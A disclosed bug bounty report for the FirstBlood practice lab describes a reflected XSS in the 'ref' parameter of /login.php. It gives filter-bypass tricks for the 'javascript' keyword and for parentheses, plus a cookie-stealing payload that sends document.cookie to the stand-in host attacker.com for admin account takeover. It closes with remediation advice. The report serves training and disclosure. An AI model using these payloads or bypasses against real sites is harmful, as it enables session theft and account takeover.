FirstBlood-#154 — Reflective XSS on /login.php endpoint through the vulnerable `ref` parameter
This issue was discovered on FirstBlood v1
On 2021-05-10, holybugx Level 5 reported:
Getting started
Learn about vulnerability types 
Getting started in bug bounties 
Test your knowledge
Free Web Application Challenges
Guides for your hunts 
ZSeano's Methodology
Effective Note Taking for bug bounties
Useful Resources 
Disclosed HackerOne Reports 
Our community
Endorsed Members
Hackevents 
Member Articles
Description
Hello Sean,
I found out that there is a reflected XSS on the /login.php endpoint through the vulnerable ref parameter which leads to account takeover.
Steps to reproduce
- Open the following link:
http://firstbloodhackers.com/login.php?action=login&ref=ja%09vascript:confirm`1`
- Click on the
Return to previous page and the XSS pops-up:
Filter bypass
I found out that certain keywords are being blocked and removed, I realized javascript keyword is being removed so I tried couple of encoding tricks such as java%09script but then I realized using this payload java keyword is removed, also realized alert keyword and ( are being removed.
I used the following tricks to bypass the filtering:
javascript --> ja%09vascriptalert --> confirm( ) --> ``
Bypass explanation
- You can use multiple encoding/unicoding tricks to bypass the
javascript keyword being removed, an example of such is:
ja%09vascript
ja%0avascript
ja%0dvascript
-
You can use confirm or prompt if keywords such as alert is blocked.
-
When parentheses are filtered you can either use ` ` as I did, or in some cases you can use encoding tricks such as HTML encode or URL encoding/Double URL encoding.
confirm(1) --> confirm`1`
Exploitation
An attacker can craft a payload to steal cookies, an example of such payload is:
http://firstbloodhackers.com/login.php?ref=ja%09vascript:window.location.href=%60http://attacker.com/$%7Bdocument.cookie%7D%60
Where http://attacker.com is the attacker's domain, opening the above link and clicking on the Return to previous page results in a redirection to the attacker's domain and the cookies will be sent to the attacker's server.
An attacker can set this cookie on his browser to access drAdmin (Administrator).
This happens because of two cookies misconfiguration:
-
Cookies are not set as httponly which makes it possible for an attacker to steal cookies using javascript.
-
Cookies are not deleted/expired as they meant to be after logging out, which makes it possible for an attacker to re-use the cookies whenever he wants to.
Set-Cookie: drps=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; Max-Age=0; path=/
Remediation
- The
ref parameter should not be controlled by users.
- Preferably set
httponly cookies so that javascript can not be used to steal cookies.
Impact
- Account takeover
Best regards,
HolyBugx
P3 Medium
Parameter:
Payload:
FirstBlood ID: 3
Vulnerability Type: Reflective XSS
The parameter "ref" is vulnerable to XSS on login.php. The developer has tried to prevent a malicious actor from redirecting to a javascript URI but the attempt to stop this was poor and thus it can be bypassed.